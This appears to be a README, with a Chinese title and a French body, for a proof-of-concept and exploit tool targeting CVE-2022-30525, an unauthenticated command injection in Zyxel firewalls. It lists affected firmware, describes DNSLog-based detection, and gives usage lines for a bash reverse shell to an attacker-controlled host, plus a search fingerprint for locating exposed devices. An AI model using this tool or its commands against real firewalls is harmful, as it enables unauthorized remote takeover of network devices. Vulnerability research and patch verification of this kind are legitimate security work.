
CVE-2022-30525 Zyxel 防火墙命令注入漏洞 POC&EXPC
CVE-2022-30525 POC & EXP
auteur: 160team.west9B
Réservé aux chercheurs en sécurité avec autorisation. Conformez-vous à la loi sur la cybersécurité. Toute conséquence relève de la responsabilité de l'utilisateur, non de l'auteur.
Le 12 mai 2022, Zyxel a publié un bulletin de sécurité corrigeant une vulnérabilité d'injection de commandes à distance non authentifiée (CVE-2022-30525) dans ses appareils pare-feu, avec un score CVSS de 9.8. Cette vulnérabilité existe dans les programmes CGI de certaines versions de pare-feu Zyxel, permettant l'exécution de commandes arbitraires sur l'appareil affecté sans authentification.
Versions concernées:
Série ATP : firmware 5.10-5.21 Patch 1
Série VPN : firmware 4.60-5.21 Patch 1
USG FLEX 100(W), 200, 500, 700 : 5.00-5.21 Patch 1
USG FLEX 50(W)/USG20(W)-VPN : 5.10-5.21 Patch 1
L'exécution de commandes de cette vulnérabilité n'a pas de retour. Par conséquent, la vérification POC envoie une requête à l'API DNSLog. Si DNSLog reçoit une requête, la vulnérabilité existe. Pour éviter les faux positifs dus à la latence réseau, la vérification DNSLog attend 10 secondes.
usage_poc: ./cve-2022-30525 -m poc -u https://192.168.1.1/
exp : reverse shell bash. Après -m exp, spécifiez l'adresse IP du VPS et le port.
**usage_exp:./cve-2022-30525 -m exp -u https://192.168.1.1/ -lhost 192.168.1.2 -lport 1337 **

title="USG FLEX xx"